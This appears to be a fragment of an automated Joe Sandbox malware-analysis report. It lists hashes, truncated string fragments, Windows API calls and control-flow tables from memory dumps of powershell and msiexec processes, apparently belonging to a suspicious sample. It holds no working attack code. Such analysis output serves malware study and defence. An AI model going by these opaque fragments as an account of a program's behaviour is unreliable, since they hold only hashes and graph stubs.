                                      • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-2309685269
                                      • Opcode ID: dabe0311688fc8365cc428ac6ccb690b0cb4f8e6aa16951dfca28b15fc875bef
                                      • Instruction ID: 5b2bcd5921c97c43e8c9e26143f146b6d778dcc9e981c37dd1fdcf33a4271731
                                      • Opcode Fuzzy Hash: dabe0311688fc8365cc428ac6ccb690b0cb4f8e6aa16951dfca28b15fc875bef
                                      • Instruction Fuzzy Hash: CDA136B1B203069FDF249E68C95066ABBF6FFC4710F18C87AD8468B250CA71D945C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                      • API String ID: 0-248005275
                                      • Opcode ID: 570ffdee16a9ca118d6ebba5a3cdd07746f3e9030c13cd0191207b06f4018da7
                                      • Instruction ID: c7cbc8cbb8927093ff47b699407fb7fd4472a693662d0defe496756809dbd814
                                      • Opcode Fuzzy Hash: 570ffdee16a9ca118d6ebba5a3cdd07746f3e9030c13cd0191207b06f4018da7
                                      • Instruction Fuzzy Hash: 80A1F971B20207DFCF64CF58CA40A6AB7E6EF89710F59847AE8059B294DB71DC41C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-1910532044
                                      • Opcode ID: c57af3e991acebeb8ac59106d59b4c133e49f22be5daad3f9d9ee23e9002c04c
                                      • Instruction ID: 4b5195099e59a1b0e01df7793aa378476ab7452cc785e5b9e6c4ead47b0f8c29
                                      • Opcode Fuzzy Hash: c57af3e991acebeb8ac59106d59b4c133e49f22be5daad3f9d9ee23e9002c04c
                                      • Instruction Fuzzy Hash: 03A136B27342468FCF249A79891076ABBE6EFC6710F1C887AD445CB352DA72C845C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$tP]q$tP]q$(cq$(cq$(cq$(cq
                                      • API String ID: 0-3567107179
                                      • Opcode ID: 8e3f931869f241b4dd2ff88c20a5e5e894101cf4d17a48cd06d08db7f9e9df26
                                      • Instruction ID: f798238a6cc8744a7e84cbe312f882bfd38f170c71bdd5146a3b6985822c9540
                                      • Opcode Fuzzy Hash: 8e3f931869f241b4dd2ff88c20a5e5e894101cf4d17a48cd06d08db7f9e9df26
                                      • Instruction Fuzzy Hash: 4D31FD70760116DFCF649F58CB10B6B7BAAEF88710F698869ED41AB394CA719C01C7E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q
                                      • API String ID: 0-3877577046
                                      • Opcode ID: 1068d4b1077c115bcbd6cc56d2c3e2693b739bcd5fc3487a4fdaa8ebb682d4dc
                                      • Instruction ID: 594be6604dd5366a4ff4379ddace41c00f50f01e9ae162aa249cd6ac19ab0d7c
                                      • Opcode Fuzzy Hash: 1068d4b1077c115bcbd6cc56d2c3e2693b739bcd5fc3487a4fdaa8ebb682d4dc
                                      • Instruction Fuzzy Hash: 046157B172030B8FDF389A6D851066ABBE6EFC6710F28887AD945CB351DA35C841C7E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$x.{k$-{k
                                      • API String ID: 0-3535003682
                                      • Opcode ID: f02d7ef1f77192a7df68b57de82564a236ee572e8c3f568514aa3a322c719453
                                      • Instruction ID: 86a9cb00dcfaaacb4d5131de123b955a14227771d2b58de41d7f5bc04c1174a9
                                      • Opcode Fuzzy Hash: f02d7ef1f77192a7df68b57de82564a236ee572e8c3f568514aa3a322c719453
                                      • Instruction Fuzzy Hash: C2124374A102159FDB64DB58CA50BEEBBB2FF89304F1085E4D9096B341CB72AD85CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-1480752206
                                      • Opcode ID: e20e204d7c1e1b5d0947ea44f972d916e67d19ac0e5d80e3843571222dce00b4
                                      • Instruction ID: d4340eef71b76a17341075b6d0ba0490d76811977b3b9bf84f9ee28e77702ae6
                                      • Opcode Fuzzy Hash: e20e204d7c1e1b5d0947ea44f972d916e67d19ac0e5d80e3843571222dce00b4
                                      • Instruction Fuzzy Hash: B46104B172420ADFCF289F79C4106AABBA6AFC2310F18C47AD8498B251DB75D845D7E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                                      • API String ID: 0-3562389410
                                      • Opcode ID: e8baef18277d287a9d4de31843808f782aa6c4c532a8f540d83348ae6e5d7dcb
                                      • Instruction ID: c955c5c816f15a15a83e0972348602c861a8b35adcd333485e86dc80ebf15499
                                      • Opcode Fuzzy Hash: e8baef18277d287a9d4de31843808f782aa6c4c532a8f540d83348ae6e5d7dcb
                                      • Instruction Fuzzy Hash: 1451A5B6E20246DFCF24CE55C540ABAB7E2BF85610F1E8479D8059B291DB71DC41CBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                      • API String ID: 0-2353078639
                                      • Opcode ID: 47b3696598d604bd581a396c1b73bc5179bd823fe38dcfc8b7d176f4f8e43eda
                                      • Instruction ID: 666d5f1cbaaa67c5672565e53857f8c3f8a66fec249cd4d07602feb90e0ee479
                                      • Opcode Fuzzy Hash: 47b3696598d604bd581a396c1b73bc5179bd823fe38dcfc8b7d176f4f8e43eda
                                      • Instruction Fuzzy Hash: CA4149B072420BDFCF355A2885106BA7BE2EFC1210F18447ED845CB291DB32C946C7A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                      • API String ID: 0-1723543176
                                      • Opcode ID: 3f5ee8b2c3f080442868f2460fb26003939dc3904e38e9c0138ee40c3caaf4a4
                                      • Instruction ID: ba1f19ea1c8ab13e19f5fc7172444df2bd452ccaaa06057e6352e84830ec2b3b
                                      • Opcode Fuzzy Hash: 3f5ee8b2c3f080442868f2460fb26003939dc3904e38e9c0138ee40c3caaf4a4
                                      • Instruction Fuzzy Hash: 5F3187B5F20216DFCB24DF58C594EA9B7B2BF88720F1A8969E8055B350C772DC41CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o]q$(o]q$(o]q$(o]q
                                      • API String ID: 0-1261621458
                                      • Opcode ID: 7e949d8304c4c6aaaad3e9133d92432b14fd3d2993a9259a4ccbc955d660e4b3
                                      • Instruction ID: a73478565323826f7cdf3a9e93b9067487416e6e493c93018892df515f97b86c
                                      • Opcode Fuzzy Hash: 7e949d8304c4c6aaaad3e9133d92432b14fd3d2993a9259a4ccbc955d660e4b3
                                      • Instruction Fuzzy Hash: BEF127B2B24246DFCF15CF68C804BAA7BA6EF85710F1D84BAE4158B291DB31D845C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q
                                      • API String ID: 0-1785108022
                                      • Opcode ID: cc96607b0f76efcbce26d57bdb829535e99b2f93f3276c3a8158320e84cf51b4
                                      • Instruction ID: 5da53cd3b5befae1992dde387c9c721769d8930d243772b53efd0c8e83d91a19
                                      • Opcode Fuzzy Hash: cc96607b0f76efcbce26d57bdb829535e99b2f93f3276c3a8158320e84cf51b4
                                      • Instruction Fuzzy Hash: 2FA1F4B0B243079FCF24DB6895546AABBF6AFC5210F28C4BAD905CB251DB35C846C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$tP]q$tP]q
                                      • API String ID: 0-3637193552
                                      • Opcode ID: 3c1bcc1252ec529dc41366f87b7d4f23dc6bb1d13e10c2ba93528076a4401cce
                                      • Instruction ID: ce747fa46823ec3bd3e68580d844e58deb9c21d38ccd1745749cef265204bf6a
                                      • Opcode Fuzzy Hash: 3c1bcc1252ec529dc41366f87b7d4f23dc6bb1d13e10c2ba93528076a4401cce
                                      • Instruction Fuzzy Hash: A68145B17143068FCB648A7C980466ABBF6EFC6320B1CC4BAD549CB251EA72DC45C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q
                                      • API String ID: 0-858218434
                                      • Opcode ID: 45b885236cdc84290184d454eb7afa088222412e25303215678322d42b1b4bda
                                      • Instruction ID: cd01bb32b1c7813d882dbc2790c68fffa0bcc600e34fc6c23493f03a97c350a3
                                      • Opcode Fuzzy Hash: 45b885236cdc84290184d454eb7afa088222412e25303215678322d42b1b4bda
                                      • Instruction Fuzzy Hash: 692131B13202065BDF38556E8950B6776DAEBC1621F28883EA8C9CB381DD76E881C360
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q
                                      • API String ID: 0-858218434
                                      • Opcode ID: 6f3be4b6ee49312a34fa29218dafd10b53f70d99b7617a09eede2b57e003ae0e
                                      • Instruction ID: 29a05509247d486996721828efa43d078d339909e36e0422839b3886eff2d3d9
                                      • Opcode Fuzzy Hash: 6f3be4b6ee49312a34fa29218dafd10b53f70d99b7617a09eede2b57e003ae0e
                                      • Instruction Fuzzy Hash: 25219AB5A3030B9BDF388E69C58066AB7B4BF85612F2DC47AD8459B201DB32D444C7A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$$]q$$]q
                                      • API String ID: 0-978391646
                                      • Opcode ID: fcd7f16ee14c833a1ac1c7fa701dbcd834572fe1556130f092df3a9a5b132cc4
                                      • Instruction ID: 8e472acc3a330413fa9b7b4240c666e96c983d8b1381f54fd576e5415dc36fe2
                                      • Opcode Fuzzy Hash: fcd7f16ee14c833a1ac1c7fa701dbcd834572fe1556130f092df3a9a5b132cc4
                                      • Instruction Fuzzy Hash: 7901497172424B4FCB3917BD16201657BE29FC1970B6D09B6C494CB396CD254C468397

                                      Execution Graph

                                      Execution Coverage:5.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:66
                                      Total number of Limit Nodes:8
                                      execution_graph 38662 27983458 DuplicateHandle 38663 279834ee 38662->38663 38664 27983210 38665 27983256 GetCurrentProcess 38664->38665 38667 279832a8 GetCurrentThread 38665->38667 38670 279832a1 38665->38670 38668 279832e5 GetCurrentProcess 38667->38668 38671 279832de 38667->38671 38669 2798331b 38668->38669 38672 27983343 GetCurrentThreadId 38669->38672 38670->38667 38671->38668 38673 27983374 38672->38673 38674 2798d910 38675 2798d978 CreateWindowExW 38674->38675 38677 2798da34 38675->38677 38678 370848 38679 37084e 38678->38679 38680 37091b 38679->38680 38683 27982108 38679->38683 38687 279820f8 38679->38687 38684 27982117 38683->38684 38691 27981824 38684->38691 38688 27982117 38687->38688 38689 27981824 GetModuleHandleW 38688->38689 38690 27982138 38689->38690 38690->38679 38692 2798182f 38691->38692 38695 27982f94 38692->38695 38694 27983abe 38694->38694 38696 27982f9f 38695->38696 38697 279841e4 38696->38697 38699 27985a68 38696->38699 38697->38694 38700 27985a89 38699->38700 38701 27985aad 38700->38701 38703 27985c18 38700->38703 38701->38697 38704 27985c25 38703->38704 38706 27985c5e 38704->38706 38707 27983fa4 38704->38707 38706->38701 38708 27983faf 38707->38708 38710 279860d0 38708->38710 38711 27983fb4 38708->38711 38710->38710 38712 27983fbf 38711->38712 38718 27985c94 38712->38718 38714 2798613f 38722 2798b460 38714->38722 38728 2798b448 38714->38728 38715 27986179 38715->38710 38719 27985c9f 38718->38719 38720 279873c8 38719->38720 38721 27985a68 GetModuleHandleW 38719->38721 38720->38714 38721->38720 38724 2798b4dd 38722->38724 38725 2798b491 38722->38725 38723 2798b49d 38723->38715 38724->38715 38725->38723 38733 2798b6d8 38725->38733 38736 2798b6c8 38725->38736 38729 2798b460 38728->38729 38730 2798b49d 38729->38730 38731 2798b6d8 GetModuleHandleW 38729->38731 38732 2798b6c8 GetModuleHandleW 38729->38732 38730->38715 38731->38730 38732->38730 38740 2798b718 38733->38740 38734 2798b6e2 38734->38724 38737 2798b6d8 38736->38737 38739 2798b718 GetModuleHandleW 38737->38739 38738 2798b6e2 38738->38724 38739->38738 38742 2798b71d 38740->38742 38741 2798b75c 38741->38734 38742->38741 38743 2798b960 GetModuleHandleW 38742->38743 38744 2798b98d 38743->38744 38744->38734
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &l/6$$]q$$]q$$]q$$]q$$]q$$]q$46'$46'$66'
                                      • API String ID: 0-402271968
                                      • Opcode ID: 728aa8659761690ae12892737a65bc4ffa4ab78a9916d66067db4fa6b84868dd
                                      • Instruction ID: d95238a8fda86e9f59510ea5a119c62815b2dbf1506d5a28418814a94d7dd5b6
                                      • Opcode Fuzzy Hash: 728aa8659761690ae12892737a65bc4ffa4ab78a9916d66067db4fa6b84868dd
                                      • Instruction Fuzzy Hash: 98E21534A01309CFCB14DF68C584A9DB7F6FF89314F6585A9D409AB266EB34ED85CB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HR6'$HR6'$$]q$$]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-3302286543
                                      • Opcode ID: 2a8f20ec607798494f82fdc32c92ab2d5acb109cb20680e7ca8f5ac32198cf0c
                                      • Instruction ID: adaee63b00cbb51d7867ea76e7254c7a2cf6ca34fb9afb71107e641c6fddead1
                                      • Opcode Fuzzy Hash: 2a8f20ec607798494f82fdc32c92ab2d5acb109cb20680e7ca8f5ac32198cf0c
                                      • Instruction Fuzzy Hash: 15526F70A01309CFDB15CB68D590B9DB7FAEB85318F208969D409EB392DB39DD81CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1652 37e370-37e382 1653 37e3e6-37e3ed 1652->1653 1654 37e384-37e3af 1652->1654 1659 37e3b6-37e3c3 1654->1659 1661 37e3c5-37e3de 1659->1661 1662 37e3ee-37e455 1659->1662 1661->1653 1672 37e457-37e459 1662->1672 1673 37e45e-37e46e 1662->1673 1674 37e6fd-37e704 1672->1674 1675 37e475-37e485 1673->1675 1676 37e470 1673->1676 1678 37e6e4-37e6f2 1675->1678 1679 37e48b-37e499 1675->1679 1676->1674 1682 37e705-37e77e 1678->1682 1683 37e6f4-37e6f8 call 377ad8 1678->1683 1679->1682 1684 37e49f 1679->1684 1683->1674 1684->1682 1686 37e697-37e6b2 call 370350 1684->1686 1687 37e556-37e577 1684->1687 1688 37e6b4-37e6d6 1684->1688 1689 37e530-37e551 1684->1689 1690 37e63e-37e664 1684->1690 1691 37e4bd-37e4de 1684->1691 1692 37e57c-37e59d 1684->1692 1693 37e5fc-37e639 1684->1693 1694 37e6d8-37e6e2 1684->1694 1695 37e4a6-37e4b8 1684->1695 1696 37e4e3-37e505 1684->1696 1697 37e5a2-37e5ca 1684->1697 1698 37e5cf-37e5f7 1684->1698 1699 37e50a-37e52b 1684->1699 1700 37e669-37e695 1684->1700 1686->1674 1687->1674 1688->1674 1689->1674 1690->1674 1691->1674 1692->1674 1693->1674 1694->1674 1695->1674 1696->1674 1697->1674 1698->1674 1699->1674 1700->1674
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Xaq$$]q
                                      • API String ID: 0-1280934391
                                      • Opcode ID: 4d3953de0db8f6fc4596ac57378cb7efd5c216fd05244b44a663fac1c2534b87
                                      • Instruction ID: af641c6518cffd6029485933731934888894219ff1f89cfdfcb026606536fd06
                                      • Opcode Fuzzy Hash: 4d3953de0db8f6fc4596ac57378cb7efd5c216fd05244b44a663fac1c2534b87
                                      • Instruction Fuzzy Hash: D7B1C674B042589BCB1EAB79889467E7BABBFC8710B14C46DD40BD7394DE38DC029792
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b835c37882321df869e17cfa6c559271ad956426d3eea7682581dd122f57fa11
                                      • Instruction ID: 3221050f50848ae1eee4102ffcc71546b35a2dcacb91575d6135dc38ef6293bd
                                      • Opcode Fuzzy Hash: b835c37882321df869e17cfa6c559271ad956426d3eea7682581dd122f57fa11
                                      • Instruction Fuzzy Hash: 1BB15E70E00209DFDF26CFA9C98579DBBF2AF88314F15C129D859E7254EB78A845CB81

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 975 279aad98-279aadb6 977 279aadb8-279aadbb 975->977 978 279aadde-279aade1 977->978 979 279aadbd-279aadd9 977->979 981 279aade3-279aadf0 978->981 982 279aadf5-279aadf8 978->982 979->978 981->982 983 279aadfe-279aae01 982->983 984 279aafb5-279aafbe 982->984 985 279aae03-279aae0c 983->985 989 279aae1b-279aae1e 983->989 984->985 986 279aafc4-279aafce 984->986 993 279aafcf-279aafd9 985->993 994 279aae12-279aae16 985->994 990 279aae28-279aae2b 989->990 991 279aae20-279aae25 989->991 995 279aae3c-279aae3f 990->995 996 279aae2d-279aae31 990->996 991->990 1004 279aafdb-279aafdd 993->1004 1005 279ab012-279ab015 993->1005 994->989 999 279aae4f-279aae52 995->999 1000 279aae41-279aae4a 995->1000 996->986 998 279aae37 996->998 998->995 1001 279aae6c-279aae6e 999->1001 1002 279aae54-279aae67 999->1002 1000->999 1006 279aae70 1001->1006 1007 279aae75-279aae78 1001->1007 1002->1001 1009 279aafdf-279ab006 1004->1009 1010 279ab016-279ab017 1004->1010 1005->1010 1006->1007 1007->977 1011 279aae7e-279aaea2 1007->1011 1012 279ab008-279ab00b 1009->1012 1022 279aaea8-279aaeb7 1011->1022 1023 279aafb2 1011->1023 1014 279ab018-279ab01b 1012->1014 1015 279ab00d-279ab010 1012->1015 1016 279ab02a-279ab02d 1014->1016 1017 279ab01d call 279ab300 1014->1017 1015->1005 1019 279ab02f-279ab04b 1016->1019 1020 279ab050-279ab053 1016->1020 1021 279ab023-279ab025 1017->1021 1019->1020 1024 279ab060-279ab063 1020->1024 1025 279ab055-279ab059 1020->1025 1021->1016 1034 279aaeb9-279aaebf 1022->1034 1035 279aaecf-279aaf0a call 279a6670 1022->1035 1023->984 1028 279ab069-279ab0a4 1024->1028 1029 279ab2cc-279ab2ce 1024->1029 1027 279ab05b 1025->1027 1025->1028 1027->1024 1038 279ab0aa-279ab0b6 1028->1038 1039 279ab297-279ab2aa 1028->1039 1031 279ab2d0 1029->1031 1032 279ab2d5-279ab2d8 1029->1032 1031->1032 1032->1012 1036 279ab2de-279ab2e8 1032->1036 1040 279aaec3-279aaec5 1034->1040 1041 279aaec1 1034->1041 1055 279aaf0c-279aaf12 1035->1055 1056 279aaf22-279aaf39 1035->1056 1045 279ab0b8-279ab0d1 1038->1045 1046 279ab0d6-279ab11a 1038->1046 1042 279ab2ac 1039->1042 1040->1035 1041->1035 1042->1029 1045->1042 1062 279ab11c-279ab12e 1046->1062 1063 279ab136-279ab175 1046->1063 1057 279aaf16-279aaf18 1055->1057 1058 279aaf14 1055->1058 1065 279aaf3b-279aaf41 1056->1065 1066 279aaf51-279aaf62 1056->1066 1057->1056 1058->1056 1062->1063 1072 279ab17b-279ab256 call 279a6670 1063->1072 1073 279ab25c-279ab271 1063->1073 1067 279aaf43 1065->1067 1068 279aaf45-279aaf47 1065->1068 1076 279aaf7a-279aafab 1066->1076 1077 279aaf64-279aaf6a 1066->1077 1067->1066 1068->1066 1072->1073 1073->1039 1076->1023 1078 279aaf6e-279aaf70 1077->1078 1079 279aaf6c 1077->1079 1078->1076 1079->1076
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: XM3$XM3$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-395432648
                                      • Opcode ID: 08cf0870bb08c714490fd5760bfed32c2689c033a0dadd162bd8f98170dc3d2d
                                      • Instruction ID: 91d5af96634ebc8dadd7ed7e55c8a6ef0ab874a3385050c3f111c1524c29d6ca
                                      • Opcode Fuzzy Hash: 08cf0870bb08c714490fd5760bfed32c2689c033a0dadd162bd8f98170dc3d2d
                                      • Instruction Fuzzy Hash: 89E16F30A0130ACFCB19DF68D480A9EB7B6EF85308F20856AD409EB355DB79DD46CB95

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1390 2798320a-2798329f GetCurrentProcess 1395 279832a8-279832dc GetCurrentThread 1390->1395 1396 279832a1-279832a7 1390->1396 1397 279832de-279832e4 1395->1397 1398 279832e5-27983319 GetCurrentProcess 1395->1398 1396->1395 1397->1398 1399 2798331b-27983321 1398->1399 1400 27983322-2798333d call 279833e0 1398->1400 1399->1400 1404 27983343-27983372 GetCurrentThreadId 1400->1404 1405 2798337b-279833dd 1404->1405 1406 27983374-2798337a 1404->1406 1406->1405
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 2798328E
                                      • GetCurrentThread.KERNEL32 ref: 279832CB
                                      • GetCurrentProcess.KERNEL32 ref: 27983308
                                      • GetCurrentThreadId.KERNEL32 ref: 27983361
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310823823.0000000027980000.00000040.00000800.00020000.00000000.sdmp, Offset: 27980000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_27980000_msiexec.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: fb50545bc38854fcfaf85e9479380ff4a9d10592ae47edb81efce2960383eadb
                                      • Instruction ID: 9d5457a1f21edb5ccd9f2ccf5cac959944e1716628db4085e97504f98f3a7f9d
                                      • Opcode Fuzzy Hash: fb50545bc38854fcfaf85e9479380ff4a9d10592ae47edb81efce2960383eadb
                                      • Instruction Fuzzy Hash: 765137B0900349DFEB14DFA9D588BEEBBF5EF88314F208459E419A7250D7389940CB65

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1413 27983210-2798329f GetCurrentProcess 1417 279832a8-279832dc GetCurrentThread 1413->1417 1418 279832a1-279832a7 1413->1418 1419 279832de-279832e4 1417->1419 1420 279832e5-27983319 GetCurrentProcess 1417->1420 1418->1417 1419->1420 1421 2798331b-27983321 1420->1421 1422 27983322-2798333d call 279833e0 1420->1422 1421->1422 1426 27983343-27983372 GetCurrentThreadId 1422->1426 1427 2798337b-279833dd 1426->1427 1428 27983374-2798337a 1426->1428 1428->1427
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 2798328E
                                      • GetCurrentThread.KERNEL32 ref: 279832CB
                                      • GetCurrentProcess.KERNEL32 ref: 27983308
                                      • GetCurrentThreadId.KERNEL32 ref: 27983361
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310823823.0000000027980000.00000040.00000800.00020000.00000000.sdmp, Offset: 27980000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_27980000_msiexec.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 972c457f4c50a0a67f34d70c85efa91c67d4a5d5cbde585526eabf98e65f0367
                                      • Instruction ID: fb1249902725968d73492c39ccd321968c8b0b5e0c7b4e46363a750fe494dcd0
                                      • Opcode Fuzzy Hash: 972c457f4c50a0a67f34d70c85efa91c67d4a5d5cbde585526eabf98e65f0367
                                      • Instruction Fuzzy Hash: B75137B0900349DFEB14DFAAD588BAEBBF5EF88314F208459E419A7360D7389940CB65

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
